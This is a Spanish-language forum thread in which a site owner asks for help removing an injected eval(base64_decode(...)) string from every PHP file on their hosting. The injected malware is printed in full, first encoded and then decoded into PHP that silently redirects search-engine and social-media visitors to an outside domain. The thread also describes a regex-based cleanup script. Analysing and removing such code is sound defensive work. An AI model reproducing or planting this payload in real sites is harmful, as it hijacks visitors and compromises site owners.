Eliminar cadenas de texto codificadas en base64 de archivos PHP

  • Autor Autor Valen
  • Fecha de inicio Fecha de inicio
V

Valen

Dseda
Hola betas recientemente me han inyectado una cadena de texto codificada en base64 en todos los archivos php de mi hosting y necesito limpiarlos. Los técnicos de Red Coruna me dicen que no pueden hacer nada y que es cosa mía por ello les pido que me ayuden a programar una pequeña aplicación que recorra todos los ficheros en busca de la cadena:
Insertar CODE, HTML o PHP:
eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb2dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKW9yIHN0cmlzdHIoJHJlZmVyZXIsImFwb3J0Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibmlnbWEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ3ZWJhbHRhIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmVndW4ucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxldXBvbi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vZHVic3RlcC5vbmVkdW1iLmNvbS8iKTsNCmV4aXQoKTsNCn0KfQp9DQp9DQp9"));
Y la sustituya por nada ("") o la borre.

Gracias betas...
 
esto es lo que dice ese codigo
PHP:
error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
$referer=$_SERVER['HTTP_REFERER'];
$uag=$_SERVER['HTTP_USER_AGENT'];
if ($uag) {
if (!stristr($uag,"MSIE 7.0")){
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: http://dubstep.onedumb.com/");
exit();
}
}
}
}
}

al parecer te redirecciona tu sitio, cuando viene de algun buscador, te toca limpiar todo ese codigo manualmente, si es wp elimina todo los plugins o vuelve a instalar el wp
 
Ya se lo que hace el código.... quiero uno para limpiarlo automáticamente
 
Enlace eliminado


¿Cómo funciona?

debes colocarlo en la raíz de tu dominio y llamarlo desde el navegador

hará una exploración recursiva de TODOS los directorios y subdirectorios buscando archivos con extensión PHP, HTML o HTM.

mirará dentro de cada archivo buscando mediante una expresión regular si hay algo como lo que puse arriba ("/eval\(base64_decode\(\'[A-Za-z0-9\=\/\+]+\'\)\);/")

si encuentra ese código, primero hará un backup de ese archivo (por si quieres deshacer los cambios... que lo dudo) añadiéndole la extensión "_hackedcopy"

por último, quitará del archivo el código malicioso

además, mostrará por pantalla el listado completo (y sangrado!!!) de los archivos revisados marcando los infectados (rojo) y los limpios (verde)

fuente : google.com 😀
 
Enlace eliminado


¿Cómo funciona?

debes colocarlo en la raíz de tu dominio y llamarlo desde el navegador

hará una exploración recursiva de TODOS los directorios y subdirectorios buscando archivos con extensión PHP, HTML o HTM.

mirará dentro de cada archivo buscando mediante una expresión regular si hay algo como lo que puse arriba ("/eval\(base64_decode\(\'[A-Za-z0-9\=\/\+]+\'\)\);/")

si encuentra ese código, primero hará un backup de ese archivo (por si quieres deshacer los cambios... que lo dudo) añadiéndole la extensión "_hackedcopy"

por último, quitará del archivo el código malicioso

además, mostrará por pantalla el listado completo (y sangrado!!!) de los archivos revisados marcando los infectados (rojo) y los limpios (verde)

fuente : google.com 😀

Una masita maestro. Lo subi y funciono joya en uno de mis sitios que le paso lo mismo. Se agradece!
 
Lo he probado limpia los archivos pero al rato se vuelven a contaminar, pudiste encontrar la semilla del malware que inyecta el codigo?
 
Excelente aporte [MENTION=10753]jpmaster[/MENTION] estoy tratando de probarlo de manerar recursiva sobre el directorio /home/ pero un problemilla de permisos no me deja ver mas alla de la carpeta del user, por lo demas, excelente.
 
Atrás
Arriba